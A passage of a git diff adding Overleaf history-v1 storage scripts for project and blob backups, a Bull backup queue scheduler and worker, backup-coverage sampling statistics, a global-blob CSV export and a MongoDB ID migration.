console.log('Backup comparison successful') + } +} + +async function compareAllProjects(options) { + const limiter = pLimit(BATCH_CONCURRENCY) + let totalErrors = 0 + let totalProjects = 0 + + async function processBatch(batch) { + if (gracefulShutdownInitiated) { + throw new Error('graceful shutdown') + } + const batchOperations = batch.map(project => + limiter(async () => { + const projectId = project._id.toHexString() + totalProjects++ + try { + console.log(`\nComparing project ${projectId} (${totalProjects})`) + await compareBackups(projectId, options) + } catch (err) { + totalErrors++ + console.error(`Failed to compare project ${projectId}:`, err) + } + }) + ) + await Promise.allSettled(batchOperations) + } + + const query = { + 'overleaf.history.id': { $exists: true }, + 'overleaf.backup.lastBackedUpVersion': { $exists: true }, + } + + await batchedUpdate( + client.db().collection('projects'), + query, + processBatch, + { + _id: 1, + 'overleaf.history': 1, + 'overleaf.backup': 1, + }, + { readPreference: 'secondary' }, + { + BATCH_RANGE_START: convertToISODate(options['start-date']), + BATCH_RANGE_END: convertToISODate(options['end-date']), + } + ) + + console.log('\nComparison Summary:') + console.log('==================') + console.log(`Total projects processed: ${totalProjects}`) + console.log(`Projects with errors: ${totalErrors}`) + + if (totalErrors > 0) { + throw new Error('Some project comparisons failed') + } +} + +async function main() { + const options = handleOptions() + await ensureGlobalBlobsLoaded() + const projectId = options.projectId + if (options.status) { + await displayBackupStatus(projectId) + } else if (options.list) { + await displayPendingBackups(options) + } else if (options.fix !== undefined) { + await fixProjectsWithoutChunks(options) + } else if (options.pending) { + await backupPendingProjects(options) + } else if (options.init) { + await initializeProjects(options) + } else if (options.compare) { + if (options['start-date'] && options['end-date']) { + await compareAllProjects(options) + } else { + await compareBackups(projectId, options) + } + } else { + await backupProject(projectId, options) + } +} + +// Only run command-line interface when script is run directly +if (import.meta.url === 
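+// ESM has no require.main === module; comparing import.meta.url against
+// process.argv[1] is the usual "only run the CLI when executed directly"
+// idiom, so backupProject and configureBackup can be imported without also
+// launching a backup. The plain string comparison can miss symlinked or
+// percent-encoded paths.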
`file://${process.argv[1]}`) { + main() + .then(() => { + console.log( + gracefulShutdownInitiated ? 'Exited - graceful shutdown' : 'Completed' + ) + }) + .catch(err => { + console.error('Error backing up project:', err) + process.exit(1) + }) + .finally(() => { + knex + .destroy() + .then(() => { + console.log('Postgres connection closed') + }) + .catch(err => { + console.error('Error closing Postgres connection:', err) + }) + client + .close() + .then(() => { + console.log('MongoDB connection closed') + }) + .catch(err => { + console.error('Error closing MongoDB connection:', err) + }) + redis + .disconnect() + .then(() => { + console.log('Redis connection closed') + }) + .catch(err => { + console.error('Error closing Redis connection:', err) + }) + }) +} diff --git a/services/history-v1/storage/scripts/backup_blob.mjs b/services/history-v1/storage/scripts/backup_blob.mjs new file mode 100644 index 0000000..314b053 --- /dev/null +++ b/services/history-v1/storage/scripts/backup_blob.mjs @@ -0,0 +1,173 @@ +// @ts-check +import commandLineArgs from 'command-line-args' +import { backupBlob, downloadBlobToDir } from '../lib/backupBlob.mjs' +import withTmpDir from '../../api/controllers/with_tmp_dir.js' +import { + BlobStore, + GLOBAL_BLOBS, + loadGlobalBlobs, +} from '../lib/blob_store/index.js' +import assert from '../lib/assert.js' +import knex from '../lib/knex.js' +import { client } from '../lib/mongodb.js' +import redis from '../lib/redis.js' +import { setTimeout } from 'node:timers/promises' +import fs from 'node:fs' + +await loadGlobalBlobs() + +/** + * Gracefully shutdown the process + * @return {Promise<void>} + */ +async function gracefulShutdown() { + console.log('Gracefully shutting down') + await knex.destroy() + await client.close() + await redis.disconnect() + await setTimeout(100) + process.exit() +} + +/** + * + * @param {string} row + * @return {BackupBlobJob} + */ +function parseCSVRow(row) { + const [historyId, hash] = row.split(',') + validateBackedUpBlobJob({ historyId, hash }) + return { historyId, hash } +} + +/** + * + * @param {BackupBlobJob} job + */ +function validateBackedUpBlobJob(job) { + assert.projectId(job.historyId) + assert.blobHash(job.hash) +} + +/** + * + * @param {string} path + * @return {Promise<Array<BackupBlobJob>>} + */ +async function readCSV(path) { + let fh + /** @type {Array<BackupBlobJob>} */ + const rows = [] + try { + fh = await fs.promises.open(path, 'r') + } catch (error) { + console.error(`Could not open file: ${error}`) + throw error + } + for await (const line of fh.readLines()) { + try { + const row = parseCSVRow(line) + if (GLOBAL_BLOBS.has(row.hash)) { + console.log(`Skipping global blob: ${line}`) + continue + } + rows.push(row) + } catch (error) { + console.error(error instanceof Error ? 
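+ // Each input row is a "historyId,hash" pair, e.g. (hypothetical values):
+ //   424242,da39a3ee5e6b4b0d3255bfef95601890afd80709
+ // Rows failing assert.projectId / assert.blobHash end up here and are
+ // skipped rather than aborting the whole run.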
error.message : error) + console.log(`Skipping invalid row: ${line}`) + } + } + return rows +} + +/** + * @typedef {Object} BackupBlobJob + * @property {string} hash + * @property {string} historyId + */ + +/** + * @param {Object} options + * @property {string} [options.historyId] + * @property {string} [options.hash] + * @property {string} [options.input] + * @return {Promise<Array<BackupBlobJob>>} + */ +async function initialiseJobs({ historyId, hash, input }) { + if (input) { + return await readCSV(input) + } + + if (!historyId) { + console.error('historyId is required') + process.exitCode = 1 + await gracefulShutdown() + } + + if (!hash) { + console.error('hash is required') + process.exitCode = 1 + await gracefulShutdown() + } + + validateBackedUpBlobJob({ historyId, hash }) + + if (GLOBAL_BLOBS.has(hash)) { + console.error(`Blob ${hash} is a global blob; not backing up`) + process.exitCode = 1 + await gracefulShutdown() + } + return [{ hash, historyId }] +} + +/** + * + * @param {string} historyId + * @param {string} hash + * @return {Promise<void>} + */ +export async function downloadAndBackupBlob(historyId, hash) { + const blobStore = new BlobStore(historyId) + const blob = await blobStore.getBlob(hash) + if (!blob) { + throw new Error(`Blob ${hash} could not be loaded`) + } + await withTmpDir(`blob-${hash}`, async tmpDir => { + const filePath = await downloadBlobToDir(historyId, blob, tmpDir) + console.log(`Downloaded blob ${hash} to ${filePath}`) + await backupBlob(historyId, blob, filePath) + console.log('Backed up blob') + }) +} + +let jobs + +const options = commandLineArgs([ + { name: 'historyId', type: String }, + { name: 'hash', type: String }, + { name: 'input', type: String }, +]) + +try { + jobs = await initialiseJobs(options) +} catch (error) { + console.error(error) + await gracefulShutdown() +} + +if (!Array.isArray(jobs)) { + // This is mostly to satisfy typescript + process.exitCode = 1 + await gracefulShutdown() + process.exit(1) +} + +for (const { historyId, hash } of jobs) { + try { + await downloadAndBackupBlob(historyId, hash) + } catch (error) { + console.error(error) + process.exitCode = 1 + } +} +await gracefulShutdown() diff --git a/services/history-v1/storage/scripts/backup_sample.mjs b/services/history-v1/storage/scripts/backup_sample.mjs new file mode 100644 index 0000000..35ee1e9 --- /dev/null +++ b/services/history-v1/storage/scripts/backup_sample.mjs @@ -0,0 +1,153 @@ +// @ts-check +import { ObjectId } from 'mongodb' +import { READ_PREFERENCE_SECONDARY } from '@overleaf/mongo-utils/batchedUpdate.js' +import { db, client } from '../lib/mongodb.js' + +const projectsCollection = db.collection('projects') + +// Enable caching for ObjectId.toString() +ObjectId.cacheHexString = true + +// Configuration +const SAMPLE_SIZE_PER_ITERATION = process.argv[2] + ? parseInt(process.argv[2], 10) + : 10000 +const TARGET_ERROR_PERCENTAGE = process.argv[3] + ? 
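+// Both knobs are positional (illustrative):
+//   node backup_sample.mjs 5000 2.5
+// samples 5000 projects per iteration until the 95% confidence interval
+// narrows to within ±2.5%.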
parseFloat(process.argv[3]) + : 5.0 + +let gracefulShutdownInitiated = false + +process.on('SIGINT', handleSignal) +process.on('SIGTERM', handleSignal) + +function handleSignal() { + gracefulShutdownInitiated = true + console.warn('graceful shutdown initiated') +} + +async function takeSample(sampleSize) { + const results = await projectsCollection + .aggregate( + [ + { $sample: { size: sampleSize } }, + { + $match: { 'overleaf.backup.lastBackedUpVersion': { $exists: true } }, + }, + { + $count: 'total', + }, + ], + { readPreference: READ_PREFERENCE_SECONDARY } + ) + .toArray() + + const count = results[0]?.total || 0 + return { totalSampled: sampleSize, backedUp: count } +} + +function calculateStatistics( + cumulativeSampled, + cumulativeBackedUp, + totalPopulation +) { + const proportion = Math.max(1, cumulativeBackedUp) / cumulativeSampled + + // Standard error with finite population correction + const fpc = Math.sqrt( + (totalPopulation - cumulativeSampled) / (totalPopulation - 1) + ) + const stdError = + Math.sqrt((proportion * (1 - proportion)) / cumulativeSampled) * fpc + + // 95% confidence interval is approximately ±1.96 standard errors + const marginOfError = 1.96 * stdError + + return { + proportion, + percentage: (proportion * 100).toFixed(2), + marginOfError, + errorPercentage: (marginOfError * 100).toFixed(2), + lowerBound: ((proportion - marginOfError) * 100).toFixed(2), + upperBound: ((proportion + marginOfError) * 100).toFixed(2), + sampleSize: cumulativeSampled, + populationSize: totalPopulation, + } +} + +async function main() { + console.log('Date:', new Date().toISOString()) + const totalCount = await projectsCollection.estimatedDocumentCount({ + readPreference: READ_PREFERENCE_SECONDARY, + }) + console.log( + `Total projects in collection (estimated): ${totalCount.toLocaleString()}` + ) + console.log(`Target margin of error: ${TARGET_ERROR_PERCENTAGE}%`) + + let cumulativeSampled = 0 + let cumulativeBackedUp = 0 + let currentError = Infinity + let iteration = 0 + + console.log('Iteration | Total Sampled | % Backed Up | Margin of Error') + console.log('----------|---------------|-------------|----------------') + + while (currentError > TARGET_ERROR_PERCENTAGE) { + if (gracefulShutdownInitiated) { + console.log('Graceful shutdown initiated. 
Exiting sampling loop.') + break + } + + iteration++ + const { totalSampled, backedUp } = await takeSample( + SAMPLE_SIZE_PER_ITERATION + ) + cumulativeSampled += totalSampled + cumulativeBackedUp += backedUp + + const stats = calculateStatistics( + cumulativeSampled, + cumulativeBackedUp, + totalCount + ) + currentError = parseFloat(stats.errorPercentage) + + console.log( + `${iteration.toString().padStart(9)} | ` + + `${cumulativeSampled.toString().padStart(13)} | ` + + `${stats.percentage.padStart(10)}% | ` + + `\u00B1${stats.errorPercentage}%` + ) + + // Small delay between iterations + await new Promise(resolve => setTimeout(resolve, 100)) + } + + const finalStats = calculateStatistics( + cumulativeSampled, + cumulativeBackedUp, + totalCount + ) + + console.log( + `Projects sampled: ${cumulativeSampled.toLocaleString()} out of ${totalCount.toLocaleString()}` + ) + console.log( + `Estimated percentage with lastBackedUpVersion: ${finalStats.percentage}%` + ) + console.log( + `95% Confidence Interval: ${finalStats.lowerBound}% - ${finalStats.upperBound}%` + ) + console.log(`Final Margin of Error: \u00B1${finalStats.errorPercentage}%`) +} + +main() + .then(() => console.log('Done.')) + .catch(err => { + console.error('Error:', err) + process.exitCode = 1 + }) + .finally(() => { + client.close().catch(err => console.error('Error closing MongoDB:', err)) + }) diff --git a/services/history-v1/storage/scripts/backup_scheduler.mjs b/services/history-v1/storage/scripts/backup_scheduler.mjs new file mode 100644 index 0000000..3fac053 --- /dev/null +++ b/services/history-v1/storage/scripts/backup_scheduler.mjs @@ -0,0 +1,429 @@ +import Queue from 'bull' +import config from 'config' +import commandLineArgs from 'command-line-args' +import logger from '@overleaf/logger' +import { + listPendingBackups, + listUninitializedBackups, + getBackupStatus, +} from '../lib/backup_store/index.js' + +logger.initialize('backup-queue') + +// Use the same redis config as backup_worker +const redisOptions = config.get('redis.queue') + +// Create a Bull queue named 'backup' +const backupQueue = new Queue('backup', { + redis: redisOptions, + defaultJobOptions: { + removeOnComplete: true, + removeOnFail: true, + }, +}) + +// Define command-line options +const optionDefinitions = [ + { name: 'clean', type: Boolean }, + { name: 'status', type: Boolean }, + { + name: 'add', + type: String, + multiple: true, + description: 'Project IDs or date range in YYYY-MM-DD:YYYY-MM-DD format', + }, + { name: 'monitor', type: Boolean }, + { + name: 'queue-pending', + type: Number, + description: + 'Find projects with pending changes older than N seconds and add them to the queue', + }, + { + name: 'show-pending', + type: Number, + description: + 'Show count of pending projects older than N seconds without adding to queue', + }, + { + name: 'limit', + type: Number, + description: 'Limit the number of jobs to be added', + }, + { + name: 'interval', + type: Number, + description: 'Time in seconds to spread jobs over (default: 300)', + defaultValue: 300, + }, + { + name: 'backoff-delay', + type: Number, + description: + 'Backoff delay in milliseconds for failed jobs (default: 1000)', + defaultValue: 1000, + }, + { + name: 'attempts', + type: Number, + description: 'Number of retry attempts for failed jobs (default: 3)', + defaultValue: 3, + }, + { + name: 'warn-threshold', + type: Number, + description: 'Warn about any project exceeding this pending age', + defaultValue: 2 * 3600, // 2 hours + }, + { + name: 'verbose', + alias: 'v', + 
type: Boolean, + description: 'Show detailed information when used with --show-pending', + }, +] + +// Parse command line arguments +const options = commandLineArgs(optionDefinitions) +const WARN_THRESHOLD = options['warn-threshold'] + +// Helper to validate date format +function isValidDateFormat(dateStr) { + return /^\d{4}-\d{2}-\d{2}$/.test(dateStr) +} + +// Helper to validate the pending time parameter +function validatePendingTime(option, value) { + if (typeof value !== 'number' || value <= 0) { + console.error( + `Error: --${option} requires a positive numeric TIME argument in seconds` + ) + console.error(`Example: --${option} 3600`) + process.exit(1) + } + return value +} + +// Helper to format the pending time display +function formatPendingTime(timestamp) { + const now = new Date() + const diffMs = now - timestamp + const seconds = Math.floor(diffMs / 1000) + return `${timestamp.toISOString()} (${seconds} seconds ago)` +} + +// Helper to add a job to the queue, checking for duplicates +async function addJobWithCheck(queue, data, options) { + const jobId = options.jobId + + // Check if the job already exists + const existingJob = await queue.getJob(jobId) + + if (existingJob) { + return { job: existingJob, added: false } + } else { + const job = await queue.add(data, options) + return { job, added: true } + } +} + +// Setup queue event listeners +function setupMonitoring() { + console.log('Starting queue monitoring. Press Ctrl+C to exit.') + + backupQueue.on('global:error', error => { + logger.info({ error }, 'Queue error') + }) + + backupQueue.on('global:waiting', jobId => { + logger.info({ jobId }, 'job is waiting') + }) + + backupQueue.on('global:active', jobId => { + logger.info({ jobId }, 'job is now active') + }) + + backupQueue.on('global:stalled', jobId => { + logger.info({ jobId }, 'job has stalled') + }) + + backupQueue.on('global:progress', (jobId, progress) => { + logger.info({ jobId, progress }, 'job progress') + }) + + backupQueue.on('global:completed', (jobId, result) => { + logger.info({ jobId, result }, 'job completed') + }) + + backupQueue.on('global:failed', (jobId, err) => { + logger.info({ jobId, err }, 'job failed') + }) + + backupQueue.on('global:paused', () => { + logger.info({}, 'Queue paused') + }) + + backupQueue.on('global:resumed', () => { + logger.info({}, 'Queue resumed') + }) + + backupQueue.on('global:cleaned', (jobs, type) => { + logger.info({ jobsCount: jobs.length, type }, 'Jobs cleaned') + }) + + backupQueue.on('global:drained', () => { + logger.info({}, 'Queue drained') + }) + + backupQueue.on('global:removed', jobId => { + logger.info({ jobId }, 'Job removed') + }) +} + +async function addDateRangeJob(input) { + const [startDate, endDate] = input.split(':') + if (!isValidDateFormat(startDate) || !isValidDateFormat(endDate)) { + console.error( + `Invalid date format for "${input}". Use YYYY-MM-DD:YYYY-MM-DD` + ) + return + } + + const jobId = `backup-${startDate}-to-${endDate}` + const { job, added } = await addJobWithCheck( + backupQueue, + { startDate, endDate }, + { jobId } + ) + + console.log( + `${added ? 
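+    // How the jobId-based duplicate check plays out (illustrative):
+    //   await addJobWithCheck(queue, { projectId }, { jobId: projectId })
+    //   // first call  -> { job, added: true }   (job enqueued)
+    //   // second call -> { job, added: false }  (existing job returned)
+    // Bull keys jobs by jobId, so probing with queue.getJob(jobId) first lets
+    // the caller report "Already exists" instead of silently skipping the add.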
'Added' : 'Already exists'}: date range backup job: ${startDate} to ${endDate}, job ID: ${job.id}` + ) +} + +// Helper to list pending and uninitialized backups +// This function combines the two cursors into a single generator +// to yield projects from both lists +async function* pendingCursor(timeIntervalMs, limit) { + for await (const project of listPendingBackups(timeIntervalMs, limit)) { + yield project + } + for await (const project of listUninitializedBackups(timeIntervalMs, limit)) { + yield project + } +} + +// Process pending projects with changes older than the specified seconds +async function processPendingProjects( + age, + showOnly, + limit, + verbose, + jobInterval, + jobOpts = {} +) { + const timeIntervalMs = age * 1000 + console.log( + `Finding projects with pending changes older than ${age} seconds${showOnly ? ' (count only)' : ''}` + ) + + let count = 0 + let addedCount = 0 + let existingCount = 0 + // Pass the limit directly to MongoDB query for better performance + const changeTimes = [] + for await (const project of pendingCursor(timeIntervalMs, limit)) { + const projectId = project._id.toHexString() + const pendingAt = + project.overleaf?.backup?.pendingChangeAt || project._id.getTimestamp() + if (pendingAt) { + changeTimes.push(pendingAt) + const pendingAge = Math.floor((Date.now() - pendingAt.getTime()) / 1000) + if (pendingAge > WARN_THRESHOLD) { + try { + const backupStatus = await getBackupStatus(projectId) + logger.warn( + { + projectId, + pendingAt, + pendingAge, + backupStatus, + warnThreshold: WARN_THRESHOLD, + }, + `pending change exceeds rpo warning threshold` + ) + } catch (err) { + logger.error( + { projectId, pendingAt, pendingAge }, + 'Error getting backup status' + ) + throw err + } + } + } + if (showOnly && verbose) { + console.log( + `Project: ${projectId} (pending since: ${formatPendingTime(pendingAt)})` + ) + } else if (!showOnly) { + const delay = Math.floor(Math.random() * jobInterval * 1000) // add random delay to avoid all jobs running simultaneously + const { job, added } = await addJobWithCheck( + backupQueue, + { projectId, pendingChangeAt: pendingAt.getTime() }, + { ...jobOpts, delay, jobId: projectId } + ) + + if (added) { + if (verbose) { + console.log( + `Added job for project: ${projectId}, job ID: ${job.id} (pending since: ${formatPendingTime(pendingAt)})` + ) + } + addedCount++ + } else { + if (verbose) { + console.log( + `Job already exists for project: ${projectId}, job ID: ${job.id} (pending since: ${formatPendingTime(pendingAt)})` + ) + } + existingCount++ + } + } + + count++ + if (count % 1000 === 0) { + console.log( + `Processed ${count} projects`, + showOnly ? '' : `(${addedCount} added, ${existingCount} existing)` + ) + } + } + // Set oldestChange to undefined if there are no changes + const oldestChange = + changeTimes.length > 0 + ? changeTimes.reduce((min, time) => (time < min ? 
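+  // A more compact, equivalent form of pendingCursor above (a sketch; same
+  // iteration order, since yield* delegates to each async iterable in turn):
+  //   async function* pendingCursor(timeIntervalMs, limit) {
+  //     yield* listPendingBackups(timeIntervalMs, limit)
+  //     yield* listUninitializedBackups(timeIntervalMs, limit)
+  //   }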
time : min)) + : undefined + + if (showOnly) { + console.log( + `Found ${count} projects with pending changes (not added to queue)` + ) + } else { + console.log(`Found ${count} projects with pending changes:`) + console.log(` ${addedCount} jobs added to queue`) + console.log(` ${existingCount} jobs already existed in queue`) + if (oldestChange) { + console.log(` Oldest pending change: ${formatPendingTime(oldestChange)}`) + } + } +} + +// Main execution block +async function run() { + const optionCount = [ + options.clean, + options.status, + options.add, + options.monitor, + options['queue-pending'] !== undefined, + options['show-pending'] !== undefined, + ].filter(Boolean).length + if (optionCount > 1) { + console.error('Only one option can be specified') + process.exit(1) + } + + if (options.clean) { + const beforeCounts = await backupQueue.getJobCounts() + console.log('Current queue state:', JSON.stringify(beforeCounts)) + console.log('Cleaning completed and failed jobs...') + await backupQueue.clean(1, 'completed') + await backupQueue.clean(1, 'failed') + const afterCounts = await backupQueue.getJobCounts() + console.log('Current queue state:', JSON.stringify(afterCounts)) + console.log('Queue cleaned successfully') + } else if (options.status) { + const counts = await backupQueue.getJobCounts() + console.log('Current queue state:', JSON.stringify(counts)) + } else if (options.add) { + const inputs = Array.isArray(options.add) ? options.add : [options.add] + for (const input of inputs) { + if (input.includes(':')) { + // Handle date range format + await addDateRangeJob(input) + } else { + // Handle project ID format + const { job, added } = await addJobWithCheck( + backupQueue, + { projectId: input }, + { jobId: input } + ) + console.log( + `${added ? 
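+        // Illustrative --add inputs and the job IDs they produce:
+        //   --add 2025-01-01:2025-01-31 -> jobId "backup-2025-01-01-to-2025-01-31"
+        //                                  with data { startDate, endDate }
+        //   --add <projectId>           -> jobId <projectId> with data { projectId }
+        // Re-running the same command prints "Already exists" rather than
+        // queueing a duplicate, via addJobWithCheck.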
'Added' : 'Already exists'}: job for project: ${input}, job ID: ${job.id}` + ) + } + } + } else if (options.monitor) { + setupMonitoring() + } else if (options['queue-pending'] !== undefined) { + const age = validatePendingTime('queue-pending', options['queue-pending']) + await processPendingProjects( + age, + false, + options.limit, + options.verbose, + options.interval, + { + attempts: options.attempts, + backoff: { + type: 'exponential', + delay: options['backoff-delay'], + }, + } + ) + } else if (options['show-pending'] !== undefined) { + const age = validatePendingTime('show-pending', options['show-pending']) + await processPendingProjects(age, true, options.limit, options.verbose) + } else { + console.log('Usage:') + console.log(' --clean Clean up completed and failed jobs') + console.log(' --status Show current job counts') + console.log(' --add [projectId] Add a job for the specified projectId') + console.log( + ' --add [YYYY-MM-DD:YYYY-MM-DD] Add a job for the specified date range' + ) + console.log(' --monitor Monitor queue events') + console.log( + ' --queue-pending TIME Find projects with changes older than TIME seconds and add them to the queue' + ) + console.log( + ' --show-pending TIME Show count of pending projects older than TIME seconds' + ) + console.log(' --limit N Limit the number of jobs to be added') + console.log( + ' --interval TIME Time interval in seconds to spread jobs over' + ) + console.log( + ' --backoff-delay TIME Backoff delay in milliseconds for failed jobs (default: 1000)' + ) + console.log( + ' --attempts N Number of retry attempts for failed jobs (default: 3)' + ) + console.log( + ' --verbose, -v Show detailed information when used with --show-pending' + ) + } +} + +// Run and handle errors +run() + .catch(err => { + console.error('Error:', err) + process.exit(1) + }) + .then(result => { + // Only exit if not in monitor mode + if (!options.monitor) { + process.exit(0) + } + }) diff --git a/services/history-v1/storage/scripts/backup_worker.mjs b/services/history-v1/storage/scripts/backup_worker.mjs new file mode 100644 index 0000000..1097bb0 --- /dev/null +++ b/services/history-v1/storage/scripts/backup_worker.mjs @@ -0,0 +1,144 @@ +import Queue from 'bull' +import logger from '@overleaf/logger' +import config from 'config' +import metrics from '@overleaf/metrics' +import { + backupProject, + initializeProjects, + configureBackup, +} from './backup.mjs' + +const CONCURRENCY = 15 +const WARN_THRESHOLD = 2 * 60 * 60 * 1000 // warn if projects are older than this +const redisOptions = config.get('redis.queue') +const JOB_TIME_BUCKETS = [10, 100, 500, 1000, 5000, 10000, 30000, 60000] // milliseconds +const LAG_TIME_BUCKETS_HRS = [ + 0.5, 0.6, 0.7, 0.8, 0.9, 1.0, 1.1, 1.2, 1.3, 1.4, 1.5, 1.75, 2, 3, 4, 5, 6, +] // hours + +// Configure backup settings to match worker concurrency +configureBackup({ concurrency: 50, useSecondary: true }) + +// Create a Bull queue named 'backup' +const backupQueue = new Queue('backup', { + redis: redisOptions, + settings: { + lockDuration: 15 * 60 * 1000, // 15 minutes + lockRenewTime: 60 * 1000, // 1 minute + maxStalledCount: 0, // mark stalled jobs as failed + }, +}) + +// Log queue events +backupQueue.on('active', job => { + logger.debug({ job }, 'job is now active') +}) + +backupQueue.on('completed', (job, result) => { + metrics.inc('backup_worker_job', 1, { status: 'completed' }) + logger.debug({ job, result }, 'job completed') +}) + +backupQueue.on('failed', (job, err) => { + metrics.inc('backup_worker_job', 1, { status: 
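+  // Failure path implied by the queue settings above (a sketch based on
+  // Bull's documented semantics): a worker holds a job lock for lockDuration
+  // (15 min) and renews it every lockRenewTime (1 min). If the process dies,
+  // renewal stops and the job is flagged as stalled; maxStalledCount: 0 then
+  // fails it immediately rather than re-running it, and the attempts/backoff
+  // options set by backup_scheduler.mjs (3 attempts, exponential backoff,
+  // 1000 ms base delay by default) govern any retries.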
'failed' }) + logger.error({ job, err }, 'job failed') +}) + +backupQueue.on('waiting', jobId => { + logger.debug({ jobId }, 'job is waiting') +}) + +backupQueue.on('error', error => { + logger.error({ error }, 'queue error') +}) + +backupQueue.on('stalled', job => { + logger.error({ job }, 'job has stalled') +}) + +backupQueue.on('lock-extension-failed', (job, err) => { + logger.error({ job, err }, 'lock extension failed') +}) + +backupQueue.on('paused', () => { + logger.info('queue paused') +}) + +backupQueue.on('resumed', () => { + logger.info('queue resumed') +}) + +// Process jobs +backupQueue.process(CONCURRENCY, async job => { + const { projectId, startDate, endDate } = job.data + + if (projectId) { + return await runBackup(projectId, job.data, job) + } else if (startDate && endDate) { + return await runInit(startDate, endDate) + } else { + throw new Error('invalid job data') + } +}) + +async function runBackup(projectId, data, job) { + const { pendingChangeAt } = data + // record the time it takes to run the backup job + const timer = new metrics.Timer( + 'backup_worker_job_duration', + 1, + {}, + JOB_TIME_BUCKETS + ) + const pendingAge = Date.now() - pendingChangeAt + if (pendingAge > WARN_THRESHOLD) { + logger.warn( + { projectId, pendingAge, job }, + 'project has been pending for a long time' + ) + } + try { + logger.debug({ projectId }, 'processing backup for project') + await backupProject(projectId, {}) + metrics.inc('backup_worker_project', 1, { + status: 'success', + }) + timer.done() + // record the replication lag (time from change to backup) + if (pendingChangeAt) { + metrics.histogram( + 'backup_worker_replication_lag_in_hours', + (Date.now() - pendingChangeAt) / (3600 * 1000), + LAG_TIME_BUCKETS_HRS + ) + } + return `backup completed ${projectId}` + } catch (err) { + metrics.inc('backup_worker_project', 1, { status: 'failed' }) + logger.error({ projectId, err }, 'backup failed') + throw err // Re-throw to mark job as failed + } +} + +async function runInit(startDate, endDate) { + try { + logger.info({ startDate, endDate }, 'initializing projects') + await initializeProjects({ 'start-date': startDate, 'end-date': endDate }) + return `initialization completed ${startDate} - ${endDate}` + } catch (err) { + logger.error({ startDate, endDate, err }, 'initialization failed') + throw err + } +} + +export async function drainQueue() { + logger.info({ queue: backupQueue.name }, 'pausing queue') + await backupQueue.pause(true) // pause this worker and wait for jobs to finish + logger.info({ queue: backupQueue.name }, 'closing queue') + await backupQueue.close() +} + +export async function healthCheck() { + const count = await backupQueue.count() + metrics.gauge('backup_worker_queue_length', count) +} diff --git a/services/history-v1/storage/scripts/export_global_blobs.mjs b/services/history-v1/storage/scripts/export_global_blobs.mjs new file mode 100644 index 0000000..ccbb123 --- /dev/null +++ b/services/history-v1/storage/scripts/export_global_blobs.mjs @@ -0,0 +1,69 @@ +/** + * A script to export the global blobs from mongo to a CSV file. 
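+ * For illustration, one row in the format described below might look like
+ * (hash taken from the global blob table added elsewhere in this commit;
+ * lengths left empty as unknown, demoted flag hypothetical):
+ *
+ * 0002bcb29ab63cf63ea2a1184ac8fba8ad4ea85c,00/02bcb29ab63cf63ea2a1184ac8fba8ad4ea85c,,,false
+ *
+ * i.e. the path is the first two hex characters of the hash, a slash, then
+ * the remainder, mirroring the blob store layout.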
+ * + * node storage/scripts/export_global_blobs.mjs --output global_blobs.csv + * + * The output CSV has the following format: + * + * hash,path,byteLength,stringLength,demoted + * + * hash: the hash of the blob + * path: the path of the blob in the blob store + * byteLength: the byte length of the blob, or empty if unknown + * stringLength: the string length of the blob, or empty if unknown + * demoted: true if the blob has been demoted to a reference, false otherwise + */ + +// @ts-check +import { ObjectId } from 'mongodb' +import { GLOBAL_BLOBS, loadGlobalBlobs } from '../lib/blob_store/index.js' +import { client } from '../lib/mongodb.js' +import commandLineArgs from 'command-line-args' +import fs from 'node:fs' + +// Enable caching for ObjectId.toString() +ObjectId.cacheHexString = true + +function parseArgs() { + const args = commandLineArgs([ + { + name: 'output', + type: String, + alias: 'o', + }, + ]) + const OUTPUT_STREAM = fs.createWriteStream(args['output'], { flags: 'wx' }) + + return { + OUTPUT_STREAM, + } +} + +const { OUTPUT_STREAM } = parseArgs() + +async function main() { + await loadGlobalBlobs() + OUTPUT_STREAM.write('hash,path,byteLength,stringLength,demoted\n') + for (const [hash, { blob, demoted }] of GLOBAL_BLOBS) { + const { hash: blobHash, byteLength, stringLength } = blob + if (blobHash !== hash) { + throw new Error(`hash mismatch: ${hash} !== ${blobHash}`) + } + const path = blobHash.slice(0, 2) + '/' + blobHash.slice(2) + const byteLengthStr = byteLength === null ? '' : byteLength + const stringLengthStr = stringLength === null ? '' : stringLength + OUTPUT_STREAM.write( + `${hash},${path},${byteLengthStr},${stringLengthStr},${demoted}\n` + ) + } +} + +main() + .then(() => console.log('Done.')) + .catch(err => { + console.error('Error:', err) + process.exitCode = 1 + }) + .finally(() => { + client.close().catch(err => console.error('Error closing MongoDB:', err)) + }) diff --git a/services/history-v1/storage/scripts/fix_string_backedUpBlobs_ids.mjs b/services/history-v1/storage/scripts/fix_string_backedUpBlobs_ids.mjs new file mode 100644 index 0000000..007eebe --- /dev/null +++ b/services/history-v1/storage/scripts/fix_string_backedUpBlobs_ids.mjs @@ -0,0 +1,51 @@ +// @ts-check +import { backedUpBlobs } from '../lib/mongodb.js' +import { mongoId } from '../lib/assert.js' +import { ObjectId } from 'mongodb' +import commandLineArgs from 'command-line-args' + +const STATS = { + total: 0, + replaced: 0, + skipped: 0, +} + +const config = commandLineArgs([ + { name: 'commit', type: Boolean, defaultValue: false }, +]) + +async function processRecord(record) { + STATS.total++ + try { + mongoId(record._id) + const newId = new ObjectId(record._id) + if (config.commit) { + await backedUpBlobs.updateOne( + { _id: newId }, + { + $addToSet: { blobs: { $each: record.blobs } }, + }, + { upsert: true } + ) + await backedUpBlobs.deleteOne({ _id: record._id }) + } + STATS.replaced++ + } catch (error) { + console.log(error) + STATS.skipped++ + } +} + +const cursor = backedUpBlobs + .find({ _id: { $type: 'string' } }) + .project({ _id: 1, blobs: 1 }) + +while (await cursor.hasNext()) { + const record = await cursor.next() + await processRecord(record) +} + +console.log( + `${!config.commit ? 
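+// Sketch of what one commit-mode pass does to a record (document shapes are
+// illustrative; the _id value is a placeholder):
+//   before: { _id: "<24-char hex string>", blobs: [ ... ] }
+//   after:  { _id: ObjectId("<same hex>"), blobs: [ ... ] }
+// The blobs are merged into the ObjectId record with $addToSet (upsert), then
+// the string-keyed record is deleted. Without --commit nothing is written,
+// so the summary below reports a dry run.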
